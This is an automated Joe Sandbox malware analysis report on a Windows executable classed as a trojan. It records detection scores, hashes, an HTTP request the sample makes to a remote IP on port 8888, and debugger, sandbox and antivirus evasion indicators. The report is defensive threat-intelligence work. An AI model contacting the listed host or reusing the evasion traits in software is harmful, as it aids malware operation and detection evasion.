Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zXR333P8h1.exe

Overview

General Information

Sample name:zXR333P8h1.exe
renamed because original name is a hash value
Original sample name:edde6b098aa5e685110c5b68f65523fc1e0a60a93268059b7a26c6e6265f91fb.exe
Analysis ID:1501753
MD5:36daa81e237927b3aa7c48a89193d2bb
SHA1:5186992f86f0911a97a395a82903ba4b89699c8c
SHA256:edde6b098aa5e685110c5b68f65523fc1e0a60a93268059b7a26c6e6265f91fb
Tags:120-46-149-112exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Machine Learning detection for sample
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Sigma detected: Communication To Uncommon Destination Ports

Classification

  • System is w10x64
  • zXR333P8h1.exe (PID: 3788 cmdline: "C:\Users\user\Desktop\zXR333P8h1.exe" MD5: 36DAA81E237927B3AA7C48A89193D2BB)
    • WerFault.exe (PID: 5636 cmdline: C:\Windows\system32\WerFault.exe -u -p 3788 -s 1112 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 120.46.149.112, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Users\user\Desktop\zXR333P8h1.exe, Initiated: true, ProcessId: 3788, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49725
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: zXR333P8h1.exeReversingLabs: Detection: 13%
Source: zXR333P8h1.exeVirustotal: Detection: 17%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: zXR333P8h1.exeJoe Sandbox ML: detected
Source: zXR333P8h1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: E:\Project\verysafe\x64\Release\verysafe.pdb source: zXR333P8h1.exe

Networking

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 8888
Source: global trafficTCP traffic: 192.168.2.5:49725 -> 120.46.149.112:8888
Source: unknownTCP traffic detected without corresponding DNS query: 120.46.149.112
Source: unknownTCP traffic detected without corresponding DNS query: 120.46.149.112
Source: unknownTCP traffic detected without corresponding DNS query: 120.46.149.112
Source: unknownTCP traffic detected without corresponding DNS query: 120.46.149.112
Source: unknownTCP traffic detected without corresponding DNS query: 120.46.149.112
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF788881000 malloc,InternetOpenW,InternetOpenUrlA,InternetReadFile,HeapCreate,RtlAllocateHeap,memcpy,SleepEx,CreateThread,WaitForSingleObject,0_2_00007FF788881000
Source: global trafficHTTP traffic detected: GET /safekey HTTP/1.1User-Agent: myappHost: 120.46.149.112:8888Cache-Control: no-cache
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.46.149.112/
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.46.149.112:8888/safekey
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBD5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.46.149.112:8888/safekeyI
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.46.149.112:8888/safekeyX
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EC0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://120.46.149.112:8888/safekeykE
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF7888810000_2_00007FF788881000
Source: C:\Users\user\Desktop\zXR333P8h1.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3788 -s 1112
Source: classification engineClassification label: mal60.troj.winEXE@2/5@0/1
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3788
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\66314fb5-46b5-4554-879a-339ca3c050a3Jump to behavior
Source: zXR333P8h1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\zXR333P8h1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: zXR333P8h1.exeReversingLabs: Detection: 13%
Source: zXR333P8h1.exeVirustotal: Detection: 17%
Source: unknownProcess created: C:\Users\user\Desktop\zXR333P8h1.exe "C:\Users\user\Desktop\zXR333P8h1.exe"
Source: C:\Users\user\Desktop\zXR333P8h1.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3788 -s 1112
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: zXR333P8h1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: zXR333P8h1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: zXR333P8h1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Project\verysafe\x64\Release\verysafe.pdb source: zXR333P8h1.exe
Source: zXR333P8h1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: zXR333P8h1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: zXR333P8h1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: zXR333P8h1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: zXR333P8h1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 8888
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exe TID: 6552Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeThread delayed: delay time: 60000Jump to behavior
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EC15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EC15000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWKp
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\zXR333P8h1.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF7888819A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7888819A8
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF7888819A8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7888819A8
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF7888814B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7888814B4
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF788881B50 SetUnhandledExceptionFilter,0_2_00007FF788881B50
Source: C:\Users\user\Desktop\zXR333P8h1.exeCode function: 0_2_00007FF788881880 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF788881880
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
21
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory31
Security Software Discovery
Remote Desktop ProtocolData from Removable Media11
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS2
System Information Discovery
Distributed Component Object ModelInput Capture1
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsInternet Connection DiscoverySSHKeylogging2
Ingress Tool Transfer
Scheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
zXR333P8h1.exe13%ReversingLabs
zXR333P8h1.exe18%VirustotalBrowse
zXR333P8h1.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
http://120.46.149.112:8888/safekey0%Avira URL Cloudsafe
http://120.46.149.112:8888/safekeykE0%Avira URL Cloudsafe
http://120.46.149.112/0%Avira URL Cloudsafe
http://120.46.149.112:8888/safekeyX0%Avira URL Cloudsafe
http://120.46.149.112:8888/safekeyI0%Avira URL Cloudsafe
No contacted domains info
NameMaliciousAntivirus DetectionReputation
http://120.46.149.112:8888/safekeyfalse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
http://upx.sf.netAmcache.hve.4.drfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://120.46.149.112/zXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://120.46.149.112:8888/safekeykEzXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EC0D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://120.46.149.112:8888/safekeyIzXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBD5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://120.46.149.112:8888/safekeyXzXR333P8h1.exe, 00000000.00000002.2314902969.0000021B6EBF1000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
120.46.149.112
unknownChina
4847CNIX-APChinaNetworksInter-ExchangeCNfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1501753
Start date and time:2024-08-30 12:42:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:zXR333P8h1.exe
renamed because original name is a hash value
Original Sample Name:edde6b098aa5e685110c5b68f65523fc1e0a60a93268059b7a26c6e6265f91fb.exe
Detection:MAL
Classification:mal60.troj.winEXE@2/5@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 2
  • Number of non-executed functions: 2
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 13.89.179.12
  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
TimeTypeDescription
06:43:28API Interceptor1x Sleep call for process: zXR333P8h1.exe modified
06:43:32API Interceptor1x Sleep call for process: WerFault.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
120.46.149.112pDxGUuWkQt.exeGet hashmaliciousUnknownBrowse
  • 120.46.149.112:8888/safekey
6zZSlt35Hr.exeGet hashmaliciousUnknownBrowse
  • 120.46.149.112:8888/safekey
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CNIX-APChinaNetworksInter-ExchangeCNpDxGUuWkQt.exeGet hashmaliciousUnknownBrowse
  • 120.46.149.112
6zZSlt35Hr.exeGet hashmaliciousUnknownBrowse
  • 120.46.149.112
sora.ppc.elfGet hashmaliciousUnknownBrowse
  • 36.119.225.164
sora.sh4.elfGet hashmaliciousMiraiBrowse
  • 36.116.144.198
SecuriteInfo.com.Linux.Siggen.9999.16227.30183.elfGet hashmaliciousMiraiBrowse
  • 36.126.70.65
sora.mips.elfGet hashmaliciousUnknownBrowse
  • 211.103.157.253
firmware.m68k.elfGet hashmaliciousUnknownBrowse
  • 101.54.87.28
firmware.sh4.elfGet hashmaliciousUnknownBrowse
  • 110.232.49.249
KKveTTgaAAsecNNaaaa.arm.elfGet hashmaliciousUnknownBrowse
  • 116.128.44.170
KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
  • 117.119.126.204
No context
No context
Process:C:\Windows\System32\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8892495183402235
Encrypted:false
SSDEEP:96:nLFYP6ZpgsPhqloA7JfuQXIDcQ3c66cENkcw3NX+HbHg/ZjnZ+ZFGLGCI72bBuOo:LCSZpg5r0Z+fkR8joxVzuiFgZ24lO8b
MD5:15ABF504055BC421E9B5810A2483A542
SHA1:04A691EFCEFE45D2B8E7FDA01DB3FC429E43B23C
SHA-256:7124E139142C290454F856BDBB35DFC5E0F4C2E2626C24C8AF3596C1EC92AF47
SHA-512:D3DAF839B3AE3641A6164C30E2B1FEA8909E0656E6610EC5A2E950C4B2290781D22462676EEDFDF4D831FDEAC39A9EEC261DFBB7FFC03E562F76EC6F13CA5517
Malicious:true
Reputation:low
Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.8.8.2.0.8.9.3.7.1.7.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.8.8.2.0.9.2.9.6.5.4.1.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.6.f.2.b.c.4.7.-.8.b.a.4.-.4.6.b.9.-.9.f.f.3.-.2.3.6.8.d.5.9.f.a.9.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.5.d.1.3.c.a.-.5.b.c.d.-.4.0.4.a.-.8.3.8.b.-.f.b.9.6.3.e.4.3.1.1.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.X.R.3.3.3.P.8.h.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.c.c.-.0.0.0.1.-.0.0.1.4.-.f.a.8.4.-.8.9.7.1.c.9.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.b.7.f.3.7.1.7.6.d.1.b.d.9.4.a.5.b.d.7.9.f.5.1.9.c.b.4.0.0.4.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.1.8.6.9.9.2.f.8.6.f.0.9.1.1.a.9.7.a.3.9.5.a.8.2.9.0.3.b.a.4.b.8.9.6.9.9.c.8.c.!.z.X.R.3.3.3.P.8.h.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.8././.2.9.
Process:C:\Windows\System32\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Fri Aug 30 10:43:29 2024, 0x1205a4 type
Category:dropped
Size (bytes):150352
Entropy (8bit):1.3179897759735029
Encrypted:false
SSDEEP:192:mjd6WzE8BmZMeSOhoOl46UHlmyQ8B/QLqbDEfwqTfv0TQWB5oBruBEf7v+iy:m6WzEQmfKOlPUHl5pkqbDEhvfW1Ez/
MD5:EB90CB4C56CA6DF100E4828F9992B96A
